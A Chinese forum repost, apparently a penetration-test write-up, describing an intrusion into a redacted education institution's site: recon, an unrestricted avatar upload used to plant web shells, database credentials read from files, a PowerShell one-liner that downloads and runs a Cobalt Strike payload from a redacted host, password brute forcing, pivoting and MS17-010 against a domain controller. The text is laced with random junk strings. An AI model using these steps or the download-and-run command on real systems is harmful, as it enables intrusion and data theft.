找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2125|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 w' l+ ~6 V* W' w9 A 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路" A2 D. n3 p- f. _+ v0 ]4 o

8 O( v: |; K+ A# f. X: k, C

* N! D8 j. ~( w" A. E) {& v  ) X1 l! U& R! ~; a

8 i& C0 `/ l1 L# E" n0 Z

' X2 n1 p7 ~1 J" {1 G8 W( q 正文. ~* o2 \) k; i& ~; d# }/ o

4 K# L. t0 S. P1 X9 Z8 y J

2 O8 n: M# k4 o3 B' N  ; z& \5 O/ s: E5 O$ A( u( N. w

C4 p1 T6 a- Z9 Z

. j1 O `4 p8 w2 A 目标:www.xxxx.com(一家教育机构)
c9 s* k4 {) x; g: r8 Q4 A
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
7 O! {: ~+ @4 j+ M. P' a

# B# H* |% h! K9 Y( a' O

% q7 k4 n7 C$ _ G; z8 a# x1 Q+ @ vshapes=! y/ M9 `/ w& `1 K, U

0 v6 g# u, M: j% l

2 v* Z3 M) a0 f" n 进行了简单的信息搜集
5 d6 A) U# h* x* }( }
0 D ~% A: R# A: P
8 U" \- f% G; R

3 U1 [0 s2 D u: H

/ h& o! @) b' G9 M2 a7 a 子域名搜集" {% O1 O' |! `" V5 U1 r

6 z4 g+ C( r1 s# p+ D9 Y; d! @0 G

$ D9 r _: g! w' P, N vshapes= 5 b. d( C) L0 f! v" F

( g% B' e# A; O3 Q5 g2 \: q

9 U! a# l4 e" A- X. t fofa找资产
1 a' A6 ~; M0 ^
7 A" }* t G- z D1 m
( N$ {) p$ Q0 M- \

3 P9 |# y, L& i n4 {: ]( l4 f

' i! ]' w' _9 F9 w: K6 P vshapes=. p0 `0 |* `7 a# X5 ]

: f7 M/ c+ _0 q% q' ~

5 r8 e. w, { s2 ] 一共七个资产。去重之后只有两个。
6 s2 n1 U9 Q2 U1 p* v
7 m! X4 u& b# q$ b
: g6 \9 P* E8 F% E/ t

0 A# i2 S/ q1 B6 H1 N3 S$ {1 ^

" Z$ P$ y$ @4 ? s, r 目录探测 R! V6 h: Q! t5 G" n, h

8 B! \# l* g/ U

1 s) R7 ]+ Q+ V; W: J vshapes= - C9 a2 ^& {4 ^1 n5 L( g! B' p5 U& ]

l" v" I o; y) B Z6 i" S+ ~

1 \& M& ]( `9 p( o* l/ i 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
8 K6 B: ~2 I; y$ c" f4 M
7 @8 s3 c5 L$ _5 r
1 b% l+ `" o+ u0 ?/ i/ B+ F( g- m0 a

, w, @0 n) P! e4 S

5 ?( a4 H% i, Z. X& h 我又尝试了通过修改返回包来绕过登录界面 - x8 f( r# g9 y" v; P

. f2 q4 u3 ~* s

) W7 Y" Y3 y$ m) P2 e4 b8 O vshapes=. y: _4 S" x2 D- a" o1 D

9 ~2 D0 s# |- ^) t6 P6 ~$ J& Q( ?. S

8 o3 J! G. i6 K1 b# e* j 还是不行,尝试注入无果 ) A- W+ B9 j. l6 a- A" i

$ f: ?3 I9 \0 w+ I

6 y6 Z. H' y4 u! q, v1 T% R vshapes= ! E: [$ h6 [( x3 i, ?# p

! M" Q/ ^1 J) T5 s+ A' o9 N' O) _

, _* ^9 J t6 x' ~3 U 不过我目录探测出了一处Spring信息泄露
) {3 g2 X+ p; M7 M
3 l# O9 t$ @8 Y+ A" I: j
* d2 ~9 G3 ?7 l6 O

/ |& |9 s4 f8 q3 c

' o& e' q3 I; N& E6 v vshapes= * L( }1 A; K! x p. Y

4 x4 H6 c6 Y- N/ K( ?- I: X

" h4 @7 A- L5 W0 U! l 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录- U: b. y( \$ x" u4 ?

4 m( Q$ V" ?) e& \' E0 r e0 t. ~

# K) B( }) N7 F" P vshapes=- K I0 G: z1 g. ^

, k" t$ t ^/ T; y3 H# O. `

* _9 ~: m! _7 P8 Z9 {6 _2 t 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 & u U6 ?" T8 b$ Q( k( o

6 _0 d: I- v# K# c0 X

0 [2 r2 k/ G: p# G vshapes=9 Y& s. u$ Q; a

- z0 h5 h- N2 E/ ]& ?

0 E7 Q& V' M( C. h; ~ 获取有些师傅到这一步就手机抓包电脑测了。8 a9 w/ _4 G3 L

3 F) }5 a% b& c! ?

, {9 a& f, d7 {! C Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ! Y; r. P1 I. ^) R5 E F

% m" I/ H0 X9 N2 ?/ c8 X

& b. f; C, R$ j 其中在一个公众号发现了小程序,可以进行注册。 7 {$ z: Z8 a1 l0 {

" V" F4 v) ~6 c$ k

$ D0 d* ]# t: ^7 k 看到了头像上传,尝试上传获取WebShell& i. ~$ _) S$ m! b( K: N2 X

/ U) y+ S1 ?8 X' P

7 W+ i. U6 f, k vshapes= 3 O& O7 }; p7 E- L' Q6 k7 H( t. q3 F

- o8 p1 T. `* A

7 }- R E% M% N1 v 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问1 s4 Z$ N) D8 y. l5 A

3 ^: S7 D3 I, S- M' ]

5 f; v0 b& a" \9 o3 B! H8 C* O vshapes= 7 \3 u% R# A: |7 ^1 P& H

5 N6 {( ~ K) b# {. n9 Z$ O" W

" m3 s% ` [- l. g7 a 然后上了大马 , O, Y% z* S/ b. S: e+ }

0 R. t n1 p+ c4 A

# t$ g( h( A v3 b# b3 N: U ]- X vshapes= 5 J: D Q9 l, i& x% b! j

5 X& J9 X+ G6 [

& P& d! o- ?7 H. o vshapes= 6 B3 ^6 Z! V# C. n# c6 n

! f" x; P0 O) q6 [9 ?) E3 W

* R( t( s( I' b, }- C 通过翻找文件发现数据库账号密码: `, X9 _, Z* h. H! K

/ [' ]5 b2 I4 W; I

) u0 n8 } J( z2 m vshapes=5 }9 e# Q6 i; x

4 a. C4 U, G( t% ^% `" {9 H

( t8 s" n p& g2 Z, \6 t- k --内网渗透0 o7 K8 q# H- S2 U0 _0 T7 v6 S1 x4 Z

9 T5 u% F! Z, q- [5 i1 |

) v# |; Q1 [+ B. n' [$ e, l- ` 直接通过powershell执行 cs上线 - F' @$ w( F; Z$ o, [7 t2 K5 p. }2 W! N

$ z+ Q2 Y& {* t; _' b( l0 q2 M

2 Y( m1 U( b, C+ w powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"9 V2 y% A& ^( C* j- w' _3 q4 Q

- R& r! P% Q& t! L4 J. h& w6 |

( t$ [) F5 ~& t2 j a- @7 j vshapes=# P; l) t4 v7 U3 l) `

3 x' E# j4 c' G

7 U5 F7 ]1 d0 k4 Z# {7 N7 K$ L 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破) H) \) y% R. Y

2 f1 b# N# h3 W) }7 q/ U- T

9 v) X, ]7 f% G; l vshapes= * T. z% m" l _. i5 Y; T

# c) \; K! D- n) e. o

4 q# v5 R( g$ l$ ?; o# W 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
6 v( `5 T- ^5 k0 \# v
+ M$ a! `+ I+ B Z
: \8 v7 ]6 J1 U* D1 w: |
, u8 L% F+ `9 ~- X7 u# W" a/ m

# e' H' u0 u" c" b

! `" h; w/ O9 A vshapes=5 ^2 z( v* B0 k2 X% R2 K. L3 [3 h

1 _& P! x0 Q4 M! P0 {1 f

& q% H& d/ \) @0 J 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. w! f* v! q1 ]; H7 C, T
- L8 F9 g; w$ [5 S ~
, _+ _. ~+ X7 [3 R: f

" K, {7 I1 h+ _# K

8 l. \3 j. g6 I vshapes= 2 W# W$ b! h8 I7 i

) {" T$ p- J* C; r

% ~- Z( i* b+ m9 Z: i; U
1 p) s, T' P$ g$ [1 L& e1 ~
8 m6 l# T/ N# d8 T1 \
" t# n6 W9 V$ w' l m: @

i+ D4 q q/ M4 t4 w3 Y1 d- Q: r

9 }; B2 S8 f8 ~   " J7 c) r3 h' h( f

% |; W+ J& U8 L: X! u

7 j, e t8 g7 A* s 小结" \7 y6 T# N# \' M

8 Q) T& K1 f) A: V+ S- L. K

) f9 ~8 n* p! |6 A( W9 D: d  + j. Q' g7 D' O# z5 H5 @

U7 r' v3 i; B$ \6 N. w# ~0 P

1 s( e8 N% J9 m6 a9 o' I. o 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! ( ~; ]- k$ Y4 ]2 D. |

/ R0 P& V; D* C k: B: y; ?

- y& E7 b+ U+ _8 V" u0 l* Q  # T# u5 B& d+ S- X. ~

* ^1 }8 o& j; X. U' a
    / k- d' T& ]3 R' e! H6 h* r
  • * J! ?: v9 l, b   $ ^1 u9 T: a P) }/ s( l w
  • 4 d u& Y- x/ f# f
  • - {. i/ N8 g5 K   5 y8 y9 ]. o: E$ [; R+ h6 \- C
  • 5 n& F7 H% D% \- v: l) V
! w( n- s4 ~. n( B

* U% W+ _6 M( ^7 c. h9 z# s 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html4 y H% P5 D3 d0 O& g

+ M5 \, \9 y$ F5 G- D7 r

2 ]9 T1 N& }. i$ h6 `) w   5 L0 P% l" j0 |; n% A# X% K

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表